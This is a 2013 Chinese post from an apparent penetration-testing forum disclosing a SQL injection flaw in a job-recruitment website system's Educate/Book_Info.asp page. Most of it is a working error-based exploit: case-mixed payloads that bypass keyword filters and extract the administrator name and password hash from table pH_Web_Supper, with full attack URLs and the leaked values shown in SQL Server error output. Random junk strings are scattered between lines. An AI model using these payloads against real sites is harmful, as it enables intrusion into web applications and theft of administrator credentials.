中国网络渗透测试联盟
标题:
网络求职招聘人才网站系统正式版漏洞
[打印本页]
作者:
admin
时间:
2013-2-13 23:56
标题:
网络求职招聘人才网站系统正式版漏洞
漏洞出现在Educate/Book_Info.asp
0 d8 e$ `2 ]! A$ s1 f/ b( |+ A
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
4 J6 q! i" Y% q) @. o n
exp:如下
# i9 ` @0 N% U$ Q5 W
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
; Y/ l8 u. E! x, c
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
+ t0 o6 ? C y& M# \ M( Z
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=
(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
1 D0 X- @( R' f7 j
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
! g. O" R+ ]' ?7 R4 W0 D
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
# n2 o5 v% x3 ~/ F9 @
/Educate/Book_Info.asp,行 8
+ f* i6 C9 }, @$ M
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=
(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
5 J& {! K! D o/ u6 b- J
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
' T+ `# J$ ~+ @# R! x, O
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
5 w, e0 P! i6 ^! ?
/Educate/Book_Info.asp,行 8
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2